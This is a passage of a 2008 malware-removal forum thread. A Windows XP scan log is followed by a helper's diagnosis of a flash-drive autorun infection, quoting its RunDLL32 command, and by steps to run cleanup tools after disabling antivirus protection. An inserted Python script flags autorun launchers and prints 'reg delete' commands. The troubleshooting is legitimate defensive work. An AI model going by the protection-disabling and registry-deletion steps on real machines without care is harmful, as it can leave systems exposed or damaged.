    2008-09-03 15:47:59 ----D---- C:\WINDOWS\ServicePackFiles
    2008-09-03 15:42:15 ----HDC---- C:\WINDOWS\$NtServicePackUninstall$
    2008-09-03 15:25:56 ----D---- C:\Program Files\Trend Micro
    2008-09-03 15:16:22 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\rhc34lj0e5f1
    2008-08-29 11:38:20 ----N---- C:\WINDOWS\system32\wmphoto.dll
    2008-08-29 11:38:18 ----N---- C:\WINDOWS\system32\wlanapi.dll
    2008-08-29 11:38:18 ----N---- C:\WINDOWS\system32\windowscodecsext.dll
    2008-08-29 11:38:18 ----N---- C:\WINDOWS\system32\windowscodecs.dll
    2008-08-29 11:38:12 ----N---- C:\WINDOWS\system32\tspkg.dll
    2008-08-29 11:38:12 ----N---- C:\WINDOWS\system32\tsgqec.dll
    2008-08-29 11:38:08 ----N---- C:\WINDOWS\system32\spupdwxp.exe
    2008-08-29 11:38:08 ----A---- C:\WINDOWS\system32\spdwnwxp.exe
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slserv.exe
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slrundll.exe
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slgen.dll
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slextspk.dll
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slcoinst.dll
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\slrundll.exe
    2008-08-29 11:38:04 ----N---- C:\WINDOWS\system32\setupn.exe
    2008-08-29 11:38:03 ----N---- C:\WINDOWS\system32\s3gnb.dll
    2008-08-29 11:38:03 ----N---- C:\WINDOWS\system32\rhttpaa.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\rasqec.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qutil.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qcliprov.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qagentrt.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qagent.dll
    2008-08-29 11:38:01 ----N---- C:\WINDOWS\system32\photometadatahandler.dll
    2008-08-29 11:38:00 ----N---- C:\WINDOWS\system32\onex.dll
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\napstat.exe
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\napmontr.dll
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\napipsec.dll
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\mtxparhd.dll
    2008-08-29 11:37:57 ----N---- C:\WINDOWS\system32\msshavmsg.dll
    2008-08-29 11:37:57 ----N---- C:\WINDOWS\system32\mssha.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mmcperf.exe
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mmcfxcommon.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mmcex.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\microsoft.managementconsole.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mdmxsdk.dll
    2008-08-29 11:37:46 ----N---- C:\WINDOWS\system32\l2gpstore.dll
    2008-08-29 11:37:46 ----N---- C:\WINDOWS\system32\kmsvc.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdpash.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdnepr.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdiultn.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdbhc.dll
    2008-08-29 11:37:39 ----N---- C:\WINDOWS\system32\smtpapi.dll
    2008-08-29 11:37:39 ----N---- C:\WINDOWS\system32\rwnh.dll
    2008-08-29 11:37:37 ----N---- C:\WINDOWS\system32\comsdupd.exe
    2008-08-29 11:37:35 ----N---- C:\WINDOWS\system32\hsfcisp2.dll
    2008-08-29 11:37:32 ----A---- C:\WINDOWS\003084_.tmp
    2008-08-29 11:37:31 ----N---- C:\WINDOWS\system32\faxpatch.exe
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapsvc.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapqec.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eappprxy.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapphost.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eappgnui.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eappcfg.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapp3hst.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapolqec.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3ui.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3svc.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3msm.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3gpclnt.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3dlg.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3cfg.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3api.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dimsroam.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dimsntfy.dll
    2008-08-29 11:37:28 ----N---- C:\WINDOWS\system32\dhcpqec.dll
    2008-08-29 11:37:27 ----N---- C:\WINDOWS\system32\credssp.dll
    2008-08-29 11:37:25 ----N---- C:\WINDOWS\system32\bitsprx4.dll
    2008-08-29 11:37:24 ----N---- C:\WINDOWS\system32\azroles.dll
    2008-08-29 11:37:24 ----N---- C:\WINDOWS\system32\ati3d1ag.dll
    2008-08-29 11:37:23 ----N---- C:\WINDOWS\system32\ati2dvaa.dll
    2008-08-29 11:37:15 ----N---- C:\WINDOWS\system32\aaclient.dll
    2008-08-29 10:39:28 ----D---- C:\Documents and Settings\All Users\Application Data\TEMP
    2008-08-29 10:39:19 ----D---- C:\Program Files\WMA-MP3.com
    2008-08-25 10:59:04 ----HDC---- C:\WINDOWS\$NtUninstallKB952954_0$
    2008-08-25 10:58:59 ----HDC---- C:\WINDOWS\$NtUninstallKB946648_0$
    2008-08-25 10:58:54 ----HDC---- C:\WINDOWS\$NtUninstallKB953839$
    2008-08-25 10:58:50 ----HDC---- C:\WINDOWS\$NtUninstallKB950974_0$
    2008-08-25 10:57:19 ----HDC---- C:\WINDOWS\$NtUninstallKB951072-v2$
    2008-08-25 10:57:13 ----HDC---- C:\WINDOWS\$NtUninstallKB952287_0$
    2008-08-25 10:56:44 ----HDC---- C:\WINDOWS\$NtUninstallKB951066_0$
    2008-08-11 14:22:42 ----D---- C:\WINDOWS\nview
    2008-08-11 14:22:42 ----A---- C:\WINDOWS\system32\nvudisp.exe
    2008-08-07 09:57:28 ----A---- C:\Documents and Settings\All Users\Application Data\xml62D.tmp
    2008-07-29 16:57:47 ----D---- C:\Pipeline
    2008-07-29 16:52:10 ----A---- C:\WINDOWS\system32\pscVSWIA.dll
    2008-07-29 16:52:09 ----A---- C:\WINDOWS\system32\pscUE116.dll
    2008-07-29 16:52:09 ----A---- C:\WINDOWS\system32\pscNE116.exe
    2008-07-29 16:52:09 ----A---- C:\WINDOWS\system32\PSCLE116.dll
    2008-07-22 10:35:53 ----A---- C:\WINDOWS\system32\javaws.exe
    2008-07-22 10:35:53 ----A---- C:\WINDOWS\system32\javaw.exe
    2008-07-22 10:35:53 ----A---- C:\WINDOWS\system32\java.exe
    2008-07-22 10:29:56 ----D---- C:\Program Files\MSXML 6.0
    2008-07-22 10:27:21 ----HDC---- C:\WINDOWS\$NtUninstallKB951748_0$
    2008-07-16 13:20:50 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\Blackberry Desktop
    2008-07-15 15:45:51 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\Research In Motion
    2008-07-15 15:45:33 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\InstallShield
    2008-07-15 15:03:42 ----D---- C:\Program Files\Common Files\Sonic Shared
    2008-07-15 15:02:19 ----D---- C:\Program Files\Common Files\Research In Motion
    2008-07-15 15:02:18 ----D---- C:\Program Files\Research In Motion
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbdkor.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbdjpn.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbd106.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbd103.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbd101c.dll
    2008-07-10 16:11:17 ----A---- C:\WINDOWS\system32\kbd101b.dll
    2008-07-09 19:16:28 ----A---- C:\WINDOWS\PSEXESVC.EXE
    2008-07-07 14:13:55 ----HDC---- C:\WINDOWS\$NtUninstallKB951376-v2_0$
    2008-07-07 14:11:54 ----HDC---- C:\WINDOWS\$NtUninstallKB951698_0$
    2008-07-07 14:11:49 ----HDC---- C:\WINDOWS\$NtUninstallKB950762_0$
    2008-07-07 14:11:43 ----HDC---- C:\WINDOWS\$NtUninstallKB950760$
    2008-06-24 14:05:46 ----D---- C:\Program Files\IKEA HomePlanner
    2008-06-24 14:05:32 ----D---- C:\Program Files\Common Files\Wise Installation Wizard
    2008-06-10 13:07:36 ----D---- C:\Program Files\Microsoft Silverlight

    List of drivers

    R1 AmdK8;AMD Processor Driver; C:\WINDOWS\system32\DRIVERS\AmdK8.sys [2005-03-09 36352]
    R1 BANTExt;Belarc SMBios Access; C:\WINDOWS\system32\System32\Drivers\BANTExt.sys []
    R2 wntpport;wntpport; C:\WINDOWS\system32\drivers\wntpport.sys [2001-01-19 28416]
    R3 GEARAspiWDM;GEARAspiWDM; C:\WINDOWS\System32\Drivers\GEARAspiWDM.sys [2006-09-19 15664]
    R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
    R3 hidusb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
    R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2005-07-13 3851264]
    R3 mouhid;Mouse HID Driver; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-04 12160]
    R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2005-12-10 3536768]
    R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\WINDOWS\system32\DRIVERS\NVENETFD.sys [2005-07-29 34048]
    R3 nvnetbus;NVIDIA Network Bus Enumerator; C:\WINDOWS\system32\DRIVERS\nvnetbus.sys [2005-07-29 12928]
    R3 RimVSerPort;RIM Virtual Serial Port v2; C:\WINDOWS\system32\DRIVERS\RimSerial.sys [2007-01-18 26496]
    R3 ROOTMODEM;Microsoft Legacy Modem Driver; C:\WINDOWS\System32\Drivers\RootMdm.sys [2004-08-04 5888]
    R3 SydexFDD;Sydex Diskette Driver; \??\C:\WINDOWS\system32\Drivers\sydexfdd.sys []
    R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
    R3 usbhub;USB2 Enabled Hub; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
    R3 usbohci;Microsoft USB Open Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbohci.sys [2008-04-13 17152]
    S3 Arp1394;1394 ARP Client Protocol; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
    S3 atinevxx;ATI WDM Rage Theater Video NSP; C:\WINDOWS\system32\DRIVERS\atinevxx.sys [2004-09-15 186368]
    S3 CCDECODE;Closed Caption Decoder; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
    S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\HdAudio.sys [2005-01-07 145920]
    S3 MSTEE;Microsoft Streaming Tee/Sink-to-Sink Converter; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
    S3 MVDCODEC;ATI WDM Specialized MVD Codec; C:\WINDOWS\system32\DRIVERS\atinmdxx.sys [2004-09-15 13824]
    S3 NABTSFEC;NABTS/FEC VBI Codec; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
    S3 NdisIP;Microsoft TV/Video Connection; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
    S3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
    S3 RimUsb;BlackBerry Smartphone; C:\WINDOWS\System32\Drivers\RimUsb.sys [2007-05-31 22656]
    S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
    S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
    S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
    S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
    S3 USBSTOR;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
    S3 WSTCODEC;World Standard Teletext Codec; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
    S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

    List of services

    R2 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [2007-09-06 110592]
    R2 Bonjour Service;##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762##; C:\Program Files\Bonjour\mDNSResponder.exe [2006-02-28 229376]
    R2 CCALib8;Canon Camera Access Library 8; C:\Program Files\Canon\CAL\CALMAIN.exe [2006-03-30 96341]
    R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2005-12-10 131139]
    R2 Stuffit Archive Name Service;Stuffit Archive Name Service; C:\Program Files\Smith Micro\StuffIt11\ArcNameService.exe [2007-10-08 157000]
    R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
    R2 WinVNC4;VNC Server Version 4; C:\Program Files\RealVNC\VNC4\WinVNC4.exe [2006-05-12 439248]
    R3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2007-04-25 654848]
    R3 iPod Service;iPod Service; C:\Program Files\iPod\bin\iPodService.exe [2007-09-26 503608]
    S2 Roxio Upnp Server 9;Roxio Upnp Server 9; C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe [2007-07-24 358896]
    S2 RoxLiveShare9;LiveShare P2P Server 9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe [2007-08-16 309744]
    S2 RoxWatch9;Roxio Hard Drive Watcher 9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe [2007-08-16 166384]
    S3 Adobe Version Cue CS3;Adobe Version Cue CS3; C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe [2007-03-20 153792]
    S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
    S3 AVVBDB;AVVBDB; C:\DOCUME~1\[USER]~1.002\LOCALS~1\Temp\AVVBDB.exe [2008-09-05 564096]
    S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2007-02-14 138168]
    S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
    S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-06-20 89136]
    S3 Roxio UPnP Renderer 9;Roxio UPnP Renderer 9; C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe [2007-07-24 88560]
    S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-08-16 1092080]
    S3 SandraDataSrv;SiSoftware Database Agent Service; C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\Win32\RpcDataSrv.exe [2006-11-24 123064]
    S3 SandraTheSrv;SiSoftware Sandra Agent Service; C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe [2006-11-24 1138880]

    -----------------EOF-----------------
     
  5. 2008/09/08
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    It looks as though an infected flash drive might have been attached to this computer. Are you able to have the user plug in the flash drive used and run a tool? The following is the evidence I'm referring to.

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}]
    shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL virgin.html


    You need to run a tool that will likely reboot the machine and resume running. The internet connection will also be disabled after starting the tool. It will, however, reconnect after restart. Are you able to do that remotely? If so, continue on.


    For the flash drive, download Flash_Disinfector by sUBs and save it to the desktop:

    NOTE: In the event you already have Flash_Disinfector, this is a new version that I need you to download.

    • Plug in the USB flash drive.
    • Double-click Flash_Disinfector.exe to run it.
    • Follow any prompts that may appear.
    • The desktop will vanish for a while, and then reappear. This is normal.
    • Wait until the program has finished scanning, then please exit the program. If more than 1 flash drive is used, run the tool with each plugged in.


    Next, download ComboFix by sUBs from here, saving the file to the desktop.


    Please disable realtime protection applications as they sometimes interfere with the tool. Check this link for applicable programs.

    • Close all open programs and windows
    • Double click combofix.exe and follow the prompts.
    • It may reboot the computer and resume running after logon. Wait for it to complete. When finished, it will open a log for you. Post that log in your next reply.
    Note: Do not mouse-click ComboFix's window while it's running. That may cause it to stall.
     
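    The MountPoints2 evidence quoted in the post above can be checked in bulk rather than by eye. The script below is an added example, not part of the thread and not code from Flash_Disinfector or ComboFix: it parses a `reg export` of HKCU\...\Explorer\MountPoints2 (Windows writes that file as UTF-16), reports every per-volume shell verb command Explorer cached from an autorun.inf, and rates as "high" the pattern seen here, a system launcher such as RunDLL32/ShellExec_RunDLL handed a file with no drive letter, i.e. one living on the removable volume itself. The sample export, the second (clean) volume GUID and the "high"/"review" rating heuristic are constructed for this example; only the first GUID and the virgin.html command come from the post. Deleting the cached `shell` subkey only clears the registry side; the drive's own autorun.inf still has to be cleaned, or Explorer recreates the key on the next insert.

```python
import re
import sys
from typing import Dict, List, Tuple

# Constructed sample in the shape of `reg export HKCU\Software\Microsoft\Windows\
# CurrentVersion\Explorer\MountPoints2 mp2.reg`. The first volume GUID and the
# RunDLL32/virgin.html command are the ones quoted in the post; the second
# volume is invented as a clean control (icon only, no shell verb command).
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}]
"BaseClass"="Drive"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}\shell]
@="AutoRun"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}\shell\AutoRun\command]
@="C:\\WINDOWS\\system32\\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL virgin.html"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1b2c3d4e-0000-1111-2222-333344445555}]
"BaseClass"="Drive"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1b2c3d4e-0000-1111-2222-333344445555}\_Autorun\DefaultIcon]
@="C:\\Program Files\\Example\\icon.ico"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"(?P<name>[^"]*)")=(?P<data>.*)$')
# Per-volume verb command: ...\MountPoints2\{GUID}\shell\<verb>\command
COMMAND_RE = re.compile(
    r"\\MountPoints2\\(?P<guid>\{[0-9a-f-]+\})\\shell\\(?P<verb>[^\\]+)\\command$",
    re.IGNORECASE,
)
# Launchers commonly abused by autorun.inf worms (heuristic list, this example's own).
LAUNCHER_RE = re.compile(r"rundll32|shellexec_rundll|wscript|cscript|cmd\.exe", re.IGNORECASE)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: {key_path: {value_name: string_data}}.
    Only REG_SZ values ("name"="..." and the default @="...") are kept, which
    is all the shell verb keys use; \\ and \" escapes are undone."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            data = m.group("data")
            if data.startswith('"') and data.endswith('"'):
                name = m.group("name") if m.group("name") is not None else "@"
                keys[current][name] = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return keys


def find_autorun_commands(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str, str]]:
    """Return (volume_guid, verb, command, rating) for every cached shell verb
    command under MountPoints2. Explorer only records one after reading an
    autorun.inf from that volume, so each is worth a look ('review'); 'high'
    marks a known launcher pointed at a target with no drive letter, i.e. a
    file carried on the removable volume itself, as in the post."""
    findings = []
    for path, values in keys.items():
        m = COMMAND_RE.search(path)
        if not m or "@" not in values:
            continue
        cmd = values["@"]
        tokens = cmd.split()
        target = tokens[-1] if tokens else ""
        volume_relative = re.match(r"^[A-Za-z]:\\|^%", target) is None
        rating = "high" if LAUNCHER_RE.search(cmd) and volume_relative else "review"
        findings.append((m.group("guid").lower(), m.group("verb"), cmd, rating))
    return findings


def remediation_commands(findings: List[Tuple[str, str, str, str]]) -> List[str]:
    """XP-era `reg delete` lines that drop the cached verb key for each flagged
    volume (registry side only; the drive's autorun.inf must be cleaned too)."""
    base = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2"
    return [f'reg delete "{base}\\{guid}\\shell" /f' for guid, _, _, _ in findings]


if __name__ == "__main__":
    # Real exports are UTF-16 with a BOM; fall back to the constructed sample.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_REG_EXPORT
    found = find_autorun_commands(parse_reg_export(text))
    for guid, verb, cmd, rating in found:
        print(f"[{rating}] {guid} shell\\{verb}\\command = {cmd}")
    for line in remediation_commands(found):
        print(line)
```

Run it against the sample and the infected volume from the post is reported as "high" with a single `reg delete` line; point it at a real export (`python mp2check.py mp2.reg`) to triage every volume the user ever plugged in.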
  6. 2008/09/09
    ynot2k

    ynot2k Inactive Thread Starter

    Joined:
    2008/02/04
    Messages:
    21
    Likes Received:
    0
    Hi noahdfear -- ComboFix did not produce a log for me. When I ran it on my machine in my lab, I got an error about renaming something.

    Anyway, I ran it on the infected machine .... and it reported some rootkit activity and would need to reboot. So it restarted. I noticed that it ran on reboot/login. No log was produced (I haven't looked for it). But I did notice that the infection seems to have magically disappeared.

    SO THANKS! Now I'm going to go and find out what ComboFix does...

    All the best,
    ynot2k
     
  7. 2008/09/10
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    On the infected machine, rename ComboFix.exe and run it again. It should complete and produce a log.

    RE: your lab machine. Safe to assume it is properly named as ComboFix.exe? Try a fresh download and this time change its name prior to saving it.
     
